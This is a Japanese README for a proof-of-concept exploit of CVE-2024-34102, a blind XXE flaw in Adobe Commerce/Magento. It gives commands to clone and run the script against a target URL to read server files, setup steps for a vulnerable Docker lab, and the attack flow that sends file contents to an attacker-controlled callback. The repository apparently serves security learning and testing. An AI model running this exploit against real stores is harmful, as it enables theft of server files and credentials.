
★ 元のコードベースについて @th3gokul、Sanjaith3hacker、Chocapikk に感謝します。 ★
CVE-2024-34102 : Adobe Commerce の XXE 脆弱性 説明: Adobe Commerce 2.4.7、2.4.6-p5、2.4.5-p7、2.4.4-p8 およびそれ以前のバージョンは、XML外部エンティティ参照('XXE')の不適切な制限の脆弱性の影響を受け、任意のコード実行が発生する可能性があります。攻撃者は、外部エンティティを参照する細工された XML ドキュメントを送信することで、この脆弱性を悪用する可能性があります。この問題の悪用にはユーザーの操作は必要ありません。
git clone https://github.com/EQSTSeminar/CVE-2024-34102.git
cd CVE-2024-34102
pip install -r requirements.txt
python CVE-2024-34102.py -u <URL_TO_EXPLOIT> -f <FILE_TO_READ>
python CVE-2024-34102.py https://magento.test -f /etc/hosts

markshust の Magento 用 Docker Configuration のおかげで、脆弱な開発環境を構築するのは難しくありません。 https://github.com/markshust/docker-magento
# Create your project directory then go into it:
mkdir /opt/magento
cd $_
# Install some stuff (needed for the script)
sudo apt update
sudo apt install -y bc curl
# Create Composer's directory (to avoid a weird error)
mkdir /var/www/.composer/
# Run this automated one-liner from the directory you want to install your project.
curl -s https://raw.githubusercontent.com/markshust/docker-magento/release/next/lib/onelinesetup | bash -s -- magento.test 2.4.7 community
# Submit credentials when needed.
# Edit hosts file
echo "127.0.0.1 magento.test" >> /etc/hosts

PHPSTORM を使用して magento をデバッグできます。
bin/xdebug enable

..そして、magento をデバッグできます。
コールバックURLを作成 (mocky api) -> Blind XXE 攻撃 (CVE-2024-34102) -> ファイルの内容を攻撃者のインスタンスに送信 (SSRFUtility) -> 攻撃者のインスタンスを読み取る (SSRFUtility)
このリポジトリは、CVE-2024-34102 に対する XXE エクスプロイトを意図したものではありません。このプロジェクトの目的は、人々がこの脆弱性について学び、場合によっては自身のアプリケーションをテストできるようにすることです。
当社は毎月 CVE およびマルウェア解析を公開しています。ご興味があれば、以下のリンクから出版物をご覧ください。 https://www.skshieldus.com/eng/business/insight.do